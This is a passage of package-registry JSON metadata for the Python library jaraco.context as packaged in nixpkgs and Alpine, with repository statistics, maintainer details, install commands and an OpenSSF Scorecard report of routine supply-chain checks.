:null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4331,"html_url":null,"role":null,"created_at":"2026-03-07T07:38:13.198Z","updated_at":"2026-03-07T07:38:13.198Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":3080},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-08-24T05:04:51.596Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":11139088,"name":"py3-jaraco.context-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-jaraco.context","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-08-21T11:39:56.000Z","latest_release_published_at":"2024-08-21T11:39:56.000Z","latest_release_number":"6.0.1-r0","last_synced_at":"2026-07-26T16:01:25.177Z","created_at":"2024-12-07T12:44:55.490Z","updated_at":"2026-08-06T19:26:18.138Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.21/community/x86_64/py3-jaraco.context-pyc","install_command":"apk add py3-jaraco.context-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.138Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.21","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context-pyc/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context-pyc/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2462,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2024-12-13T18:43:36.029Z","updated_at":"2024-12-13T18:43:36.029Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.21","url":"https://pkgs.alpinelinux.org/packages?branch=v3.21","ecosystem":"alpine","default":false,"packages_count":25394,"maintainers_count":413,"namespaces_count":2,"keywords_count":3607,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1400},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-12-06T12:06:36.014Z","updated_at":"2026-08-24T05:06:22.358Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/namespaces"}},{"id":13296172,"name":"python310Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T06:27:31.563Z","latest_release_published_at":"2026-02-02T06:27:31.563Z","latest_release_number":"4.3.0","last_synced_at":"2026-04-10T22:02:45.423Z","created_at":"2026-02-02T06:27:26.245Z","updated_at":"2026-08-06T19:26:18.167Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=python310Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python310Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/python-modules/jaraco-context/default.nix#L40","metadata":{"nix_attribute":"python3.10-jaraco-context-4.3.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:40","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.167Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python310Packages.jaraco-context?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python310Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python310Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python310Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"pa